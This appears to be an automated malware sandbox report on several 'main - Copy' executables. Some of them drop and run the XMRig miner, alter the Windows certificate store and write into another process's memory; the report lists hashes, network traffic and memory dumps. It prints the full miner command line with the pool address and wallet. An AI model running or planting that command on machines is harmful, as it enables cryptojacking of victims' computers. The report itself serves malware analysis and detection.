Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4912 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4912 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=4156 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4052,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| BE | 88.221.83.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2968-14-0x000001B37ADD0000-0x000001B37ADF0000-memory.dmp
memory/2968-15-0x000001B37C6D0000-0x000001B37C6F0000-memory.dmp
memory/2968-16-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-18-0x000001B37C710000-0x000001B37C730000-memory.dmp
memory/2968-17-0x000001B37C6F0000-0x000001B37C710000-memory.dmp
memory/2968-19-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-20-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-23-0x000001B37C710000-0x000001B37C730000-memory.dmp
memory/2968-22-0x000001B37C6F0000-0x000001B37C710000-memory.dmp
memory/2968-21-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-24-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-25-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-26-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-27-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-28-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-29-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-30-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-31-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-32-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-33-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-34-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-35-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-36-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-37-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-38-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-39-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-40-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-41-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-42-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-43-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-44-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-45-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-46-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-47-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-48-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-49-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-50-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-51-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-52-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-53-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-54-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-55-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-56-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-57-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-58-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-59-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-60-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-61-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-62-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-63-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-64-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-65-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-66-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-67-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-68-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-69-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-70-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-71-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-72-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-73-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-74-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-75-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-76-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-77-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-78-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-79-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-80-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-81-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-82-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:41
Platform
win10v2004-20240508-en
Max time kernel
1550s
Max time network
1563s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
Network
| Country | Destination | Domain | Proto |
| US | 23.53.113.159:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240508-en
Max time kernel
1660s
Max time network
1673s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:43
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1807s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 228 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 228 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5056 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4208 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 23.35.229.160:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.229.35.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.33.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.161.192.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.229.35.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4456-16-0x000001F2317E0000-0x000001F231800000-memory.dmp
memory/4456-17-0x000001F233220000-0x000001F233240000-memory.dmp
memory/4456-18-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-21-0x000001F233240000-0x000001F233260000-memory.dmp
memory/4456-20-0x000001F233260000-0x000001F233280000-memory.dmp
memory/4456-19-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-22-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-23-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-24-0x000001F233260000-0x000001F233280000-memory.dmp
memory/4456-25-0x000001F233240000-0x000001F233260000-memory.dmp
memory/4456-26-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-27-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-28-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-29-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-30-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-31-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-32-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-33-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-34-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-35-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-36-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-37-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-38-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-39-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-40-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-41-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-42-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-43-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-44-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-45-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-46-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-47-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-48-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-49-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-50-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-51-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-52-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-53-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-54-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-55-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-56-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-57-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-58-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-59-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-60-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-61-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-62-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-63-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-64-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-65-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
memory/4456-66-0x00007FF6A8270000-0x00007FF6A8D73000-memory.dmp
